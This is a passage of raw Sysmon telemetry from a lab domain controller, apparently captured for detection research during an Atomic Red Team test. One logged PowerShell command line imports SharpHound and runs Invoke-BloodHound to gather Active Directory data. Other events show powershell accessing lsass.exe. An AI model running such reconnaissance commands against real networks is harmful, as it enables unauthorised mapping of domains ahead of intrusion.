b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4a82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4e1471(wow64) 154100x80000000000000002243837Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.445{05ADC7E1-6E2C-603E-F8AA-00000000AD01}10584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {write-host \""Import and Execution of SharpHound.ps1 from C:\AtomicRedTeam\atomics\T1059.001\src\"" -ForegroundColor Cyan import-module C:\AtomicRedTeam\atomics\T1059.001\src\SharpHound.ps1 Invoke-BloodHound -OutputDirectory $env:Temp Start-Sleep 5} C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x80000000000000002243836Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.436{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-03-02 16:56:11.776 11241100x80000000000000002243835Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.436{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-03-02 16:56:11.773 23542300x80000000000000002243834Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.404{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\art-err.txtMD5=7C77310AD343C8A197AC79E50EEE9815,SHA256=BD64687834D3524042E3CEE7ED6B9D195E38A3C515969A47827C09E65569FBF2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243833Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.278{05ADC7E1-6E2B-603E-F7AA-00000000AD01}14064ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243832Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.008{05ADC7E1-229F-6039-1100-00000000AD01}1152NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=6FA79150A30B20A420F6ABBF920D9C1F,SHA256=AAADFF8FF522EB14F3A2E0C0DF3F7869C6AF6ABD37D2C1BAA8DDC5A4F0C80556,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002243962Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:03.550{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local49961- 354300x80000000000000002243961Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:03.233{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local58545- 23542300x80000000000000002243960Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:13.775{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=DA37BC9D956D0A567430A2279D9A1C06,SHA256=58C2D2CF93851102DD101FAF9A3C85842370F2F6F93D5C946E82E6B39DE1A634,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243959Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:13.451{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B972444F85EF02A7538264C80A9B502C,SHA256=F78AB82E99F9DA3C4CFB200A5DEAFAAC60A3AE1A49F7E2272E2D8345BCD266A7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002243958Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:13.201{05ADC7E1-229F-6039-0D00-00000000AD01}62014144C:\Windows\system32\svchost.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243957Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:13.201{05ADC7E1-229F-6039-0D00-00000000AD01}62014144C:\Windows\system32\svchost.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000002243965Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:03.261{00000000-0000-0000-0000-000000000000}14064<unknown process>-tcptruefalse10.0.1.14win-dc-974.attackrange.local60180-false185.199.109.133cdn-185-199-109-133.github.com443https 23542300x80000000000000002243964Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:14.475{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90AE6A9E2C6024A6980D2B1533DA5D19,SHA256=7DECFA0FB86BB11052BDE2B8BD31B679C7433988669E4B0FE9E9B6C589AAD9D6,IMPHASH=00000000000000000000000000000000falsetrue 22542200x80000000000000002243963Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:03.254{00000000-0000-0000-0000-000000000000}14064raw.githubusercontent.com0::ffff:185.199.109.133;::ffff:185.199.110.133;::ffff:185.199.111.133;::ffff:185.199.108.133;<unknown process> 354300x80000000000000002243968Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:05.285{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60181-false10.0.1.12-8000- 23542300x80000000000000002243967Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:15.498{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9F5EF3639EBA1AC969D7A6E9B9E8FF3,SHA256=3D1E558E1A0BE1C6040BDCE078F6BD3DDBA09A72CCFBA093A7D36FA13AB6CFDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243966Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:15.186{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E2004FFF8C24B1ABB0A06DFE36E12472,SHA256=62234B5622A55B875F0751155B88A3929F188EEFC71B5816DA70674D0D185794,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243969Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:16.529{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=785D6112221033B753AAFF8F31ABE6F0,SHA256=A3D50C3E30CA1FF789BBA31402BAC4DAA24DCFEAAB3D26734E2305FD3A3CCDB4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243973Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:17.975{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\art-err.txtMD5=323814294684D7AFFC82A5419CB1E987,SHA256=2F619DC3DC1702C815ABF31481B87DB3152114297C4AC7869EA6087AC9B1E4E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243972Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:17.936{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\art-out.txtMD5=3857640AB8C6D106BA278B5267D3E409,SHA256=4ADF202E7A51B5CFC70BBBBB45FF4FDE2F919D7DA89F9A381817FD682671454F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243971Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:17.875{05ADC7E1-6E2C-603E-F8AA-00000000AD01}10584ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243970Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:17.563{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC5E3903050E8AD24DE68C9418E2BF27,SHA256=EDA5F653B820C039591ABE558A836A6E0DE7676D9025A9E6C9EEB23608A7E9EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243996Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:18.920{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=45E9340EDCE080023D001233775D60C6,SHA256=11C5BA9DCEEC9D34505C33710B02AB1BD7D9E3F66C2339E19BD058BE96758F46,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243995Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:18.889{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8F91277DE3B6E0EB725F0821513D915C,SHA256=8B5D22B43D7FAC58B285BB35215D323D6D1EBD20DBA28D450B6E3BCF9EF0EAC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243994Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:18.592{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9177C7D593DCFC36BC0C1FE4A54BA45,SHA256=EA206A7783F4E3F74F1500C55FE0C6A6259E5AC4C12B2F4C37937805438DB61A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002243993Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:18.201{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6E32-603E-F9AA-00000000AD01}14192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243992Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:18.201{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6E32-603E-F9AA-00000000AD01}14192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243991Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:18.154{05ADC7E1-229D-6039-0B00-00000000AD01}852892C:\Windows\system32\lsass.exe{05ADC7E1-6E32-603E-F9AA-00000000AD01}14192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243990Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:18.154{05ADC7E1-229D-6039-0B00-00000000AD01}852892C:\Windows\system32\lsass.exe{05ADC7E1-6E32-603E-F9AA-00000000AD01}14192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002243989Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:56:18.123{05ADC7E1-6E32-603E-F9AA-00000000AD01}14192\PSHost.132591777780380855.14192.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002243988Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:18.108{05ADC7E1-6E32-603E-F9AA-00000000AD01}14192ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_xd40ynop.tlm.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243987Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:18.108{05ADC7E1-6E32-603E-F9AA-00000000AD01}14192ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_k33lqi5d.0os.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002243986Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:18.092{05ADC7E1-6E32-603E-F9AA-00000000AD01}14192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_k33lqi5d.0os.ps12021-03-02 16:56:18.092 10341000x80000000000000002243985Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:18.075{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6E32-603E-F9AA-00000000AD01}14192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243984Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:18.029{05ADC7E1-6CB1-603E-35AA-00000000AD01}148289956C:\Windows\system32\conhost.exe{05ADC7E1-6E32-603E-F9AA-00000000AD01}14192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243983Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:18.029{05ADC7E1-6CB1-603E-34AA-00000000AD01}1169612080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-6E32-603E-F9AA-00000000AD01}14192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|UNKNOWN(00007FF829F94433) 10341000x80000000000000002243982Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:18.029{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243981Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:18.029{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243980Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:18.029{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243979Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:18.029{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243978Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:18.029{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-6E32-603E-F9AA-00000000AD01}14192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002243977Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 